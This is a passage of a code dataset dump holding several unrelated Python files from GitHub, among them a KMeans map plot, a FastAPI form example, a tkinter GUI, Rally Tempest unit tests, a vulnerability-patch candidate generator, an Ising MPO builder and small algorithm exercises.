df.loc[df['类别'] == 3]\n # print(category)\n category3 = category.groupby(['所在区市']).count()['单价']\n x = category3.index.tolist()\n y = category3.values.tolist()\n # print(x, y)\n new_x = [x + '区' for x in x]\n print(category3)\n c = (\n Map(init_opts=opts.InitOpts(width=\"1500px\", height=\"800px\"))\n .add(\"上海\", [list(z) for z in zip(new_x, y)], \"上海\")\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"3类\"), visualmap_opts=opts.VisualMapOpts()\n )\n .render(\"KMeans结果/第3类分布.html\")\n )\n\n\nif __name__ == '__main__':\n category_0()\n category_1()\n category_2()\n 
category_3()\n","repo_name":"JDKwillim/python-lianjia","sub_path":"data_any/kmean_analysis.py","file_name":"kmean_analysis.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"18935011070","text":"\nfrom fastapi import FastAPI\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.requests import Request\nfrom pydantic_forms import PydanticForm\nfrom pydantic import BaseModel\n\ntemplates = Jinja2Templates(directory=\"my/template/directory\")\napp = FastAPI()\n\nclass MyForm(BaseModel):\n name: str\n age: int\n\n@app.get('/my_form', response_class=HTMLResponse)\nasync def get_my_form(request: Request):\n form = await PydanticForm.create(request, MyForm)\n return templates.TemplateResponse(\"myform.html\", {\"request\": request, 'form': form})\n\n@app.post('/my_form', response_class=HTMLResponse)\nasync def handle_my_form(request: Request):\n form = await PydanticForm.validate_request(request, MyForm)\n if form.is_valid:\n model = form.model\n return f\"Hello {model.name} you are {model.age} years old\"\n else:\n return templates.TemplateResponse(\"myform.html\", {\"request\": request, 'form': form})\n\n","repo_name":"dfitzpatrick/pydantic-forms","sub_path":"docs/source/fastapi_example.py","file_name":"fastapi_example.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"25745114763","text":"import tkinter as tk\n\n\nclass HelloWorldApplicationV2(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n self.stateWindow = None\n self.switchState(1)\n self.pack()\n\n # State 1: Welcome screen. State 2: Home screen\n def switchState(self, state):\n self.stateWindow.destroy() if self.stateWindow is not None else None\n\n if state == 1:\n self.stateWindow = WelcomeScreen(self)\n elif state == 2:\n self.stateWindow = HomeScreen(self)\n\n self.stateWindow.pack()\n\n\n\n\n\nclass WelcomeScreen(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n\n self.label = tk.Label(self, text=\"Welcome to Hello World Application!\")\n self.button = tk.Button(self, text='Click to enter application', command = lambda: self.master.switchState(2) )\n self.label.pack()\n self.button.pack()\n\n\nclass HomeScreen(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n\n self.label = tk.Label(self, text=\"Press Button Below for Hello World!\", fg='Red')\n self.button = tk.Button(self, text=\"Hello!\", command=HomeScreen.printHello )\n self.exit = tk.Button(self, text='Exit', command=root.quit)\n\n self.label.pack()\n self.button.pack()\n self.exit.pack()\n\n @staticmethod\n def printHello():\n print(\"Hello From Tkinter!\")\n\n\n\n\nroot = tk.Tk()\nmain = HelloWorldApplicationV2(root)\nmain.mainloop()\n","repo_name":"AdmiJW/Python","sub_path":"Topics/GUI with Tkinter/1.1-Hello_World_V2.py","file_name":"1.1-Hello_World_V2.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"3022270430","text":"# -*- coding:utf-8 -*-\n\nimport unittest\nfrom phystats.repeat_timer import RepeatTimer\nfrom phystats.kafkah.kafka_helper import KafkaHelper\n\n\nclass TestKafkaConsume(unittest.TestCase):\n def test_consume_msgs(self):\n topic = \"phystats\"\n host = 'localhost'\n port = 9092\n kafka_helper = 
KafkaHelper(topic=topic, host=host, port=port)\n msgs = kafka_helper.consume_data(topic=None, boot_server=None, limit=None)\n print(len(msgs))\n\n\nif __name__ == '__main__':\n test = TestKafkaConsume()\n test.test_consume_msgs()","repo_name":"byuegv/phystats","sub_path":"test/test_kafka_consumer.py","file_name":"test_kafka_consumer.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"74898836996","text":"import subprocess\nimport sys\nimport os\nimport traceback\nfrom pathlib import Path\n\n\ndef main(argv):\n buggy_file_lines = open(argv[0], \"r\").readlines()\n buggy_line_number = int(argv[1])\n buggy_line = buggy_file_lines[buggy_line_number-1]\n predictions = open(argv[2], \"r\").readlines()\n reco_lines = open(argv[3], \"r\").readlines()\n starting_pred_pos = int(argv[5])\n if len(reco_lines) > 0:\n recover_line = reco_lines[0]\n recovers = recover_line.split(\";\")\n else:\n recovers = []\n\n recover_dic = {}\n str_list = []\n if len(recovers) != 0:\n for recover in recovers:\n tokens = recover.split(\"->\")\n if len(tokens) == 2:\n if tokens[1] != \"str\":\n recover_dic[tokens[1]] = tokens[0]\n else:\n str_list.append(tokens[0])\n predictions_recover = []\n for predict in predictions:\n tokens = predict.split(\" \")\n recover_line = \"\"\n str_num = 1\n count = 0\n for token in tokens:\n if token in recover_dic.keys():\n token = recover_dic[token]\n elif token == \"str\":\n if str_num <= len(str_list):\n token = str_list[str_num-1]\n str_num += 1\n else:\n str_num += 1\n if count + 1 < len(tokens) and tokens[count + 1] == \"=\" and count - 1 >= 0 and tokens[count - 1] != \".\":\n recover_line += \" \" + token\n elif token == \"private\" or token == \"static\" or token == \"final\":\n recover_line += token + \" \"\n else:\n recover_line += token\n count += 1\n predictions_recover.append(recover_line)\n white_space_before_buggy_line = buggy_line[0:buggy_line.find(buggy_line.lstrip())]\n for i in range(starting_pred_pos, starting_pred_pos + 10):\n output_file = os.path.join(argv[4], str(i+1), os.path.basename(argv[0]))\n os.makedirs(os.path.dirname(output_file))\n output_file = open(output_file, \"w\")\n for j in range(len(buggy_file_lines)):\n if(j+1 == buggy_line_number):\n last_char = buggy_file_lines[j].rstrip()[-1]\n if predictions_recover[i][-1] != last_char:\n output_file.write(white_space_before_buggy_line + predictions_recover[i].rstrip()+last_char+\"\\n\")\n else:\n output_file.write(white_space_before_buggy_line + predictions_recover[i])\n else:\n output_file.write(buggy_file_lines[j])\n output_file.close()\n\n\nif __name__ == \"__main__\":\n start_id = \"VUL4J-1\"\n cont = True\n for i in range(1, 80):\n vul_id = \"VUL4J-\" + str(i)\n if vul_id != start_id:\n if cont:\n continue\n else:\n cont = False\n\n root_path = \"./vul4j/\" + vul_id + \"/\"\n\n for file in os.listdir(root_path):\n vul_case_path = root_path + \"/\" + file + \"/\"\n\n if os.path.isdir(vul_case_path)\\\n and file != \"patch\" and file != \"generated_patch\" \\\n and \"_\" in file:\n\n generated_patch_path = vul_case_path + \"/generated_patch\"\n Path(generated_patch_path).mkdir(parents=False, exist_ok=True)\n\n count1 = 0\n with open(vul_case_path + \"src-num.txt\", \"r\") as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip()\n vul_file_path = line.split(\";\")[0]\n vulnerable_line = line.split(\";\")[1].split(\",\")[0]\n\n try:\n main([vul_file_path,\n vulnerable_line,\n 
vul_case_path + \"pred_simu.txt\",\n vul_case_path + \"recover.txt\",\n generated_patch_path,\n str(count1 * 10)])\n\n vul_file_name = vul_file_path.split(\"/\")[-1]\n\n for file2 in os.listdir(generated_patch_path):\n subprocess.call(f\"diff --strip-trailing-cr {vul_file_path} {generated_patch_path}/{file2}/{vul_file_name} > {generated_patch_path}/{file2}/patch.diff\",\n shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n except Exception as e:\n print(\"\", end=\"\")\n\n count1 += 1","repo_name":"tuhh-softsec/APR4Vul","sub_path":"experiments/SeqTrans/patch_generation.py","file_name":"patch_generation.py","file_ext":"py","file_size_in_byte":4634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"38580417481","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport json\nimport os\nimport subprocess\nfrom unittest import mock\n\nfrom rally import exceptions\n\nfrom rally_openstack.verification.tempest import manager\nfrom tests.unit import test\n\n\nPATH = \"rally_openstack.verification.tempest.manager\"\n\n\nclass TempestManagerTestCase(test.TestCase):\n\n def test_run_environ_property(self):\n mock.patch(\"%s.testr.TestrLauncher.run_environ\" % PATH,\n new={\"some\": \"key\"}).start()\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n env = {\"some\": \"key\",\n \"OS_TEST_PATH\": os.path.join(tempest.repo_dir,\n \"tempest/test_discover\"),\n \"TEMPEST_CONFIG\": \"tempest.conf\",\n \"TEMPEST_CONFIG_DIR\": os.path.dirname(tempest.configfile)}\n\n self.assertEqual(env, tempest.run_environ)\n\n def test_configfile_property(self):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n self.assertEqual(os.path.join(tempest.home_dir, \"tempest.conf\"),\n tempest.configfile)\n\n @mock.patch(\"%s.open\" % PATH, side_effect=mock.mock_open())\n def test_get_configuration(self, mock_open):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n tempest.get_configuration()\n\n mock_open.assert_called_once_with(tempest.configfile)\n mock_open.side_effect().read.assert_called_once_with()\n\n @mock.patch(\"%s.config.TempestConfigfileManager\" % PATH)\n def test_configure(self, mock_tempest_configfile_manager):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n cm = mock_tempest_configfile_manager.return_value\n extra_options = mock.Mock()\n\n self.assertEqual(cm.create.return_value,\n tempest.configure(extra_options))\n mock_tempest_configfile_manager.assert_called_once_with(\n tempest.verifier.env)\n cm.create.assert_called_once_with(tempest.configfile, extra_options)\n\n @mock.patch(\"%s.config.os.path.exists\" % PATH)\n def test_is_configured(self, mock_exists):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n self.assertTrue(tempest.is_configured())\n\n @mock.patch(\"rally.verification.utils.extend_configfile\")\n def test_extend_configuration(self, mock_extend_configfile):\n tempest = 
manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n extra_options = mock.Mock()\n self.assertEqual(mock_extend_configfile.return_value,\n tempest.extend_configuration(extra_options))\n mock_extend_configfile.assert_called_once_with(extra_options,\n tempest.configfile)\n\n @mock.patch(\"%s.open\" % PATH, side_effect=mock.mock_open())\n def test_override_configuration(self, mock_open):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n new_content = mock.Mock()\n\n tempest.override_configuration(new_content)\n\n mock_open.assert_called_once_with(tempest.configfile, \"w\")\n mock_open.side_effect().write.assert_called_once_with(new_content)\n\n @mock.patch(\"%s.os.path.exists\" % PATH)\n @mock.patch(\"%s.utils.check_output\" % PATH)\n @mock.patch(\"%s.TempestManager.check_system_wide\" % PATH)\n def test_install_extension(self, mock_check_system_wide, mock_check_output,\n mock_exists):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\",\n system_wide=True))\n e = self.assertRaises(NotImplementedError, tempest.install_extension,\n None, None, {\"key\": \"value\"})\n self.assertIn(\"verifiers don't support extra installation settings\",\n \"%s\" % e)\n\n test_reqs_path = os.path.join(tempest.base_dir, \"extensions\",\n \"example\", \"test-requirements.txt\")\n\n # case #1 system-wide installation\n source = \"https://github.com/example/example\"\n tempest.install_extension(source)\n\n path = os.path.join(tempest.base_dir, \"extensions\")\n mock_check_output.assert_called_once_with(\n [\"pip\", \"install\", \"--no-deps\", \"--src\", path, \"-e\",\n \"git+https://github.com/example/example@master#egg=example\"],\n cwd=tempest.base_dir, env=tempest.environ)\n mock_check_system_wide.assert_called_once_with(\n reqs_file_path=test_reqs_path)\n\n mock_check_output.reset_mock()\n\n # case #2 virtual env with specified version\n tempest.verifier.system_wide = False\n version = \"some\"\n tempest.install_extension(source, version=version)\n\n self.assertEqual([\n mock.call([\n \"pip\", \"install\", \"--src\", path, \"-e\",\n \"git+https://github.com/example/example@some#egg=example\"],\n cwd=tempest.base_dir, env=tempest.environ),\n mock.call([\"pip\", \"install\", \"-r\", test_reqs_path],\n cwd=tempest.base_dir, env=tempest.environ)],\n mock_check_output.call_args_list)\n\n @mock.patch(\"%s.utils.check_output\" % PATH)\n def test_list_extensions(self, mock_check_output):\n plugins_list = [\n {\"name\": \"some\", \"entry_point\": \"foo.bar\", \"location\": \"/tmp\"},\n {\"name\": \"another\", \"entry_point\": \"bar.foo\", \"location\": \"/tmp\"}\n ]\n mock_check_output.return_value = json.dumps(plugins_list)\n\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n\n self.assertEqual(plugins_list, tempest.list_extensions())\n self.assertEqual(1, mock_check_output.call_count)\n mock_check_output.reset_mock()\n\n mock_check_output.side_effect = subprocess.CalledProcessError(\"\", \"\")\n self.assertRaises(exceptions.RallyException, tempest.list_extensions)\n self.assertEqual(1, mock_check_output.call_count)\n\n @mock.patch(\"%s.TempestManager.list_extensions\" % PATH)\n @mock.patch(\"%s.os.path.exists\" % PATH)\n @mock.patch(\"%s.shutil.rmtree\" % PATH)\n def test_uninstall_extension(self, mock_rmtree, mock_exists,\n mock_list_extensions):\n plugins_list = [\n {\"name\": \"some\", \"entry_point\": \"foo.bar\", \"location\": \"/tmp\"},\n {\"name\": \"another\", \"entry_point\": \"bar.foo\", \"location\": \"/tmp\"}\n ]\n 
mock_list_extensions.return_value = plugins_list\n\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n\n tempest.uninstall_extension(\"some\")\n mock_rmtree.assert_called_once_with(plugins_list[0][\"location\"])\n mock_list_extensions.assert_called_once_with()\n\n mock_rmtree.reset_mock()\n mock_list_extensions.reset_mock()\n\n self.assertRaises(exceptions.RallyException,\n tempest.uninstall_extension, \"unexist\")\n\n mock_list_extensions.assert_called_once_with()\n self.assertFalse(mock_rmtree.called)\n\n @mock.patch(\"%s.TempestManager._transform_pattern\" % PATH)\n @mock.patch(\"%s.testr.TestrLauncher.list_tests\" % PATH)\n def test_list_tests(self, mock_testr_launcher_list_tests,\n mock__transform_pattern):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n\n self.assertEqual(mock_testr_launcher_list_tests.return_value,\n tempest.list_tests())\n mock_testr_launcher_list_tests.assert_called_once_with(\"\")\n self.assertFalse(mock__transform_pattern.called)\n mock_testr_launcher_list_tests.reset_mock()\n\n pattern = mock.Mock()\n\n self.assertEqual(mock_testr_launcher_list_tests.return_value,\n tempest.list_tests(pattern))\n mock_testr_launcher_list_tests.assert_called_once_with(\n mock__transform_pattern.return_value)\n mock__transform_pattern.assert_called_once_with(pattern)\n\n @mock.patch(\"%s.testr.TestrLauncher.validate_args\" % PATH)\n def test_validate_args(self, mock_testr_launcher_validate_args):\n tm = manager.TempestManager(mock.Mock())\n tm.validate_args({})\n tm.validate_args({\"pattern\": \"some.test\"})\n tm.validate_args({\"pattern\": \"set=smoke\"})\n tm.validate_args({\"pattern\": \"set=compute\"})\n tm.validate_args({\"pattern\": \"set=full\"})\n\n e = self.assertRaises(exceptions.ValidationError, tm.validate_args,\n {\"pattern\": \"foo=bar\"})\n self.assertEqual(\"Validation error: 'pattern' argument should be a \"\n \"regexp or set name (format: 'tempest.api.identity.\"\n \"v3', 'set=smoke').\", \"%s\" % e)\n\n e = self.assertRaises(exceptions.ValidationError, tm.validate_args,\n {\"pattern\": \"set=foo\"})\n self.assertIn(\"Test set 'foo' not found in available Tempest test \"\n \"sets. 
Available sets are \", \"%s\" % e)\n\n    def test__transform_pattern(self):\n        tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n\n        self.assertEqual(\"foo\", tempest._transform_pattern(\"foo\"))\n        self.assertEqual(\"foo=bar\", tempest._transform_pattern(\"foo=bar\"))\n        self.assertEqual(\"\", tempest._transform_pattern(\"set=full\"))\n        self.assertEqual(\"smoke\", tempest._transform_pattern(\"set=smoke\"))\n        self.assertEqual(\"tempest.bar\", tempest._transform_pattern(\"set=bar\"))\n        self.assertEqual(\"tempest.api.compute\",\n                         tempest._transform_pattern(\"set=compute\"))\n\n    @mock.patch(\"%s.TempestManager._transform_pattern\" % PATH)\n    def test_prepare_run_args(self, mock__transform_pattern):\n        tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n\n        self.assertEqual({}, tempest.prepare_run_args({}))\n        self.assertFalse(mock__transform_pattern.called)\n\n        self.assertEqual({\"foo\": \"bar\"},\n                         tempest.prepare_run_args({\"foo\": \"bar\"}))\n        self.assertFalse(mock__transform_pattern.called)\n\n        pattern = mock.Mock()\n        self.assertEqual({\"pattern\": mock__transform_pattern.return_value},\n                         tempest.prepare_run_args({\"pattern\": pattern}))\n        mock__transform_pattern.assert_called_once_with(pattern)\n","repo_name":"openstack/rally-openstack","sub_path":"tests/unit/verification/tempest/test_manager.py","file_name":"test_manager.py","file_ext":"py","file_size_in_byte":10931,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"62"}
{"seq_id":"72394477317","text":"def find_root(x):\n    if roots[x] == x:\n        return x\n    else:\n        return find_root(roots[x])\n\ndef union(x, y):\n    if x < y:\n        roots[y] = x\n        # The for-loop below is only needed when finding groups! Not needed here.\n    else:\n        roots[x] = y\n\nV, E = map(int, input().split())\nroots = [i for i in range(V+1)] # make set\ndata = []\nfor _ in range(E):\n    data.append(list(map(int, input().split())))\ndata.sort(key=lambda x:x[2])\n\nans = 0\nfor a, b, c in data:\n    a_root = find_root(a)\n    b_root = find_root(b)\n    if a_root != b_root:\n        union(a_root, b_root)\n        ans += c\nprint(ans)","repo_name":"hyunspace/TIL-APS","sub_path":"백준/골드4/1197_최소스피닝트리0407.py","file_name":"1197_최소스피닝트리0407.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"15290082590","text":"# Exercise 2.4.1\n# Using a list comprehension, pick out only the strings in word_list whose first letter is 'a' and build a list from them\n# Before the change \n\nword_list = [\"apple\", \"watch\", \"apolo\", \"star\", \"abocado\"]\n# Before using a list comprehension\nlist = []\nfor str in word_list:\n    if str[0] == 'a':\n        list.append(str)\nprint(list)\n\n# After using a list comprehension\nlist2 = [str for str in word_list if str[0] == 'a']\nprint(list2)","repo_name":"devsj87/python_advanced","sub_path":"myvenv/Chapter02/05.실습문제.2.4.1.py","file_name":"05.실습문제.2.4.1.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"6459275435","text":"import numpy as np\n\nH, W, N = map(int, input().split())\n\nAB = [map(int, input().split()) for _ in range(N)]\nA, B = [list(i) for i in zip(*AB)]\n\n# Initialize an H-row by W-column 2D array with zeros\nABlist = np.zeros((H, W))\n\n# Place the existing cards\nfor i in range(N):\n    ABlist[A[i] - 1][B[i] - 1] = i + 1\n\n\"\"\"Deleting from the front would cause out-of-range access, so delete from the back instead\"\"\"\n# Delete rows that contain no cards\nfor h in range(H - 1, -1, -1):\n    if all([x == 0 for x in ABlist[h, :]]):\n        ABlist = np.delete(ABlist, h, 0)\n\n# Delete columns that contain no cards\nfor w in range(W - 1, -1, -1):\n    if all([y == 0 for y in ABlist[:, w]]):\n        ABlist = 
np.delete(ABlist, w, 1)\n\n# Detect the indices of the remaining cards\nresult = []\nfor i in range(len(ABlist[0, :])):\n    for j in range(len(ABlist[:, 0])):\n        for x in range(len(ABlist[0, :]) * len(ABlist[:, 0])):\n            if ABlist[i][j] == (x + 1):\n                result.insert((x), [i + 1, j + 1])\n\nfor card in result:\n    print(card[0], card[1])","repo_name":"halpi17/AtCoder","sub_path":"BeginnerContest213/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"29755856272","text":"# Last modified: 2022/09/14 17:27:43\n\nfrom math import sin, cos, sinh, cosh, sqrt\n\nimport numpy as np\nfrom scipy import linalg as LA\nfrom tensornetwork import ncon\nimport logging\n\nsx = np.array([[0.,1.],[1.,0.]])\nsz = np.array([[1.,0.],[0.,-1.]])\nid = np.eye(2)\nzero = np.zeros([2,2])\n\ndef IsingMPO(LL: int, J: float = 1., g: float = 0.4) -> list[np.array]:\n\n    \"\"\" Ising Hamiltonian in MPO form \"\"\"\n\n    Wmpo = [id]*LL\n    \n    # I put a minus in front of this to get the correct Ising Ham with an overall minus,\n    # alternatively one could just define the couplings as negative I guess\n    #  |\n    #  v\n    \n    Wmpo[0] = - np.array([[g*sx, J*sz, id]])\n\n    for j in range(1,LL-1):\n        Wmpo[j] = np.array([[id, zero, zero],\n                            [sz, zero, zero], \n                            [g*sx, J*sz, id ]])\n    \n    Wmpo[LL-1] = np.array([[id],[sz],[g*sx]]) \n\n\n    # in my MPO I start from the right and go towards the left, vs. Luca who goes from left to right \n    #\n    #  |0><0| x 1  +  10 x Z -h   20 x X + h \n\n\n    logging.info(f\"Ising MPO, parameters: J={J} g={g}, shapes:\")\n    logging.info([np.shape(w) for w in Wmpo])\n\n    print(Wmpo[0])\n    \n    return Wmpo\n\n\ndef IsingMPO_swapLR(LL: int, J: float = 1., g: float = 0.4) -> list[np.array]:\n\n    \"\"\" Ising Hamiltonian in MPO form \"\"\"\n\n    Wmpo = [id]*LL\n    \n    # I put a minus in front of this to get the correct Ising Ham with an overall minus,\n    # alternatively one could just define the couplings as negative I guess\n    #  |\n    #  v\n    \n    Wmpo[0] = - np.array([[g*sx, J*sz, id]])\n\n    for j in range(1,LL-1):\n        Wmpo[j] = np.array([[id, zero, zero],\n                            [sz, zero, zero], \n                            [g*sx, J*sz, id ]])\n    \n    Wmpo[LL-1] = np.array([[id],[sz],[g*sx]]) \n\n\n    # in my MPO I start from the right and go towards the left, vs. Luca who goes from left to right \n    #\n    #  |0><0| x 1  +  10 x Z -h   20 x X + h \n\n\n    logging.info(f\"Ising MPO, parameters: J={J} g={g}, shapes:\")\n    logging.info([np.shape(w) for w in Wmpo])\n\n    print(Wmpo[0])\n\n    for i,wi in enumerate(Wmpo):\n        Wmpo[i] = wi.transpose(0,1,3,2)\n    \n    return Wmpo\n\n\n\n\n\ndef OneMinusEpsHIsingMPO(LL: int, J: float = 1., g: float = 0.4, eps: float = 0.1) -> list[np.array]:\n    \"\"\" 1 - eps*H in MPO form, should be seen as a first approx to exp(-eps*H) \"\"\"\n\n    Wmpo = [id]*LL\n    \n    Wmpo[0] = np.array([[id + eps*g*sx, +eps*J*sz, +eps*id]])\n\n    for j in range(1,LL-1):\n        Wmpo[j] = np.array([[id, zero, zero],\n                            [sz, zero, zero], \n                            [g*sx, J*sz, id ]])\n    \n    Wmpo[LL-1] = np.array([[id],[sz],[g*sx]]) \n\n\n    # in my MPO I start from the right and go towards the left, vs. Luca who goes from left to right \n    #\n    #  |0><0| x 1  +  10 x Z -h   20 x X + h \n\n\n    logging.info(f\"Ising MPO, parameters: J={J} g={g}, shapes:\")\n    logging.info([np.shape(w) for w in Wmpo])\n    \n    return Wmpo\n    \n\n\ndef expMinusEpsHIsingMPO(LL: int, J: float = 1., g: float = 0.4, eps: float = 0.1, mode=\"svd\") -> list[np.array]:\n    \n    \"\"\" Exp(-tau*Hising) in MPO form, \n    using second-order Trotter, built with SVD \"\"\"\n\n    if mode == \"svd\":\n        Ut =np.reshape(LA.expm(eps*np.kron(sz,sz)),(2,2,2,2))\n        \n        u, s, v = LA.svd( np.reshape(np.transpose(Ut,(0,2,1,3)),(4,4)) )\n        # only 2 of the 4 SVs are nonzero, so we can truncate \n        #vss = LA.sqrtm(np.diag(s)) @ v;\n        vss = LA.sqrtm(np.diag(s[:2])) @ v[:2,:]\n        #ssu = u @ LA.sqrtm(np.diag(s));\n        ssu = u[:,:2] @ LA.sqrtm(np.diag(s[:2]))\n\n        MPO = ncon([np.reshape(ssu,(2,2,2)),np.reshape(vss,(2,2,2))],[[-3,1,-2],[-1,1,-4]]) \n        WW = ncon([LA.expm(eps*g*0.5*sx), MPO, LA.expm(eps*g*0.5*sx)],[[-3,1],[-1,-2,1,2],[2,-4]])\n    \n    elif mode == \"sin\":\n        \n        print(\"Using sinh/cosh decomposition (symmetric form)\")\n        m11= cosh(eps)*LA.expm(g*sz*eps)\n        #m11= cosh(eps)*LA.expm(-g*sz*eps)\n\n        #m12=1j*sqrt(sinh(eps)*cosh(eps))*LA.expm(-g*sz*eps/2.)*sx*LA.expm(-g*sz*eps/2.)\n        m12=1j*sqrt(sinh(eps)*cosh(eps))*LA.expm(g*sz*eps/2.)*sx*LA.expm(g*sz*eps/2.)\n        m21= m12 \n        #m22=-sinh(eps)*LA.expm(-g*sz*eps)\n        m22=-sinh(eps)*LA.expm(g*sz*eps)\n        \n        WW = np.asarray([[ m11, m12],[m21, m22]])\n    \n\n    # Fill the MPO matrices\n    Wmpo = [WW]* LL\n    \n    #For the edges \n    # First column: WW[0:2,0,:,:]\n    # First row: WW[0,0:2,:,:]\n    \n    # Wmpo[0] = WW[0:2,0,:,:].reshape(1,2,2,2)\n    # Wmpo[LL-1] = WW[0,0:2,:,:].reshape(2,1,2,2)\n    \n    Wmpo[0] = WW[0,0:2,:,:].reshape(1,2,2,2)\n    Wmpo[LL-1] = WW[0:2,0,:,:].reshape(2,1,2,2)\n    return Wmpo\n    ","repo_name":"starsfordummies/dummyrg","sub_path":"code/stefanoMPS/myIsingMPO.py","file_name":"myIsingMPO.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"1580696737","text":"def beautiful(lis):\n    dic = {}\n    lis = lis.upper()\n    for i in lis:\n        if i in dic:\n            dic[i] = dic[i] + 1\n        else:\n            dic[i] = 1\n    val = list(dic.values())\n    val.sort(reverse=True)\n    weight = list(range(1, 27))\n    weight.sort(reverse=True)\n    sum1 = 0\n    for i, j in zip(val, weight):\n        sum1 = sum1 + i * j\n    return sum1\n\n\ndef beautiful_lis(s_lis):\n    a = []\n    for i in s_lis:\n        a.append(beautiful(i))\n    return a\n\n\nwhile True:\n    try:\n        n = int(input())\n        name_lis = []\n        # name_lis=[\"zhangsan\",\"lisi\"]\n        for i in range(n):\n            name_lis.append(input())\n\n        val = beautiful_lis(name_lis)\n        for i in val:\n            print(i)\n    except:\n        break","repo_name":"moguoyi/httpApi","sub_path":"huaweiTest/name_list.py","file_name":"name_list.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"7170600199","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport shlex\n\nfrom setuptools import setup, find_packages\nfrom setuptools.command.test import test\n\n\nclass RunTest(test):\n    pytest_args = ''\n    mypy_args = list()\n\n    def initialize_options(self):\n        test.initialize_options(self)\n        self.mypy_args = ['utilspy']\n\n    def run_tests(self):\n        # import here, cause outside the eggs aren't loaded\n        import pytest\n        import mypy.api\n\n        color_red = '\\x1b[31;1m'\n        color_green = '\\x1b[32;1m'\n        color_default = '\\x1b[0m'\n        exit_ok = 0\n\n        err_no = pytest.main(shlex.split(self.pytest_args))\n        if err_no != exit_ok:\n            
sys.exit(err_no)\n\n print(\">>> Running mypy\")\n stdout, _, status = mypy.api.run(args=self.mypy_args)\n if status:\n raise SystemExit(\"{color_red}ERROR!\\n {color_default}{msg}\".format(\n color_red=color_red, color_default=color_default, msg=stdout))\n\n print(\"{color}All good{default}\".format(color=color_green, default=color_default))\n sys.exit(exit_ok)\n\n\nhere = os.path.realpath(os.path.dirname(__file__))\nreq_dir = os.path.join(here, 'requirements')\n\n\ndef parse_requirements(filename):\n \"\"\" load requirements from a pip requirements file \"\"\"\n lineiter = (line.strip() for line in open(filename))\n return [line for line in lineiter if line and not line.startswith((\"#\", \"--\"))]\n\n\nrequirements = parse_requirements(os.path.join(req_dir, 'main.txt'))\ntest_requirements = parse_requirements(os.path.join(req_dir, 'test.txt'))\n\nversion_file = open(os.path.join(here, 'VERSION'))\nversion = version_file.read().strip()\n\nsetup(\n name='utilspy',\n version=version,\n description='Generic code for python',\n long_description='',\n classifiers=[\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 3.6',\n ],\n author='Naoko Reeves',\n author_email='',\n \n url='https://github.com/naoko/utilspy.git',\n packages=find_packages(exclude=('tests*',)),\n include_package_data=True,\n zip_safe=False,\n install_requires=requirements,\n tests_require=test_requirements,\n cmdclass={\n 'test': RunTest,\n },\n)\n","repo_name":"naoko/utilspy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"70557501638","text":"from base import BaseHandler\nfrom tornado.gen import coroutine\nimport rethinkdb as r\n\n\nclass RedeemInviteHandler(BaseHandler):\n\n @coroutine\n def post(self):\n\n invite = self.request.data\n query = self.db.requests.get(invite['code'])\n result = yield self.db.run_query(query)\n if not result:\n self.error(code=403, message=\"Invalid Invite Code\", data=invite['code'])\n return\n 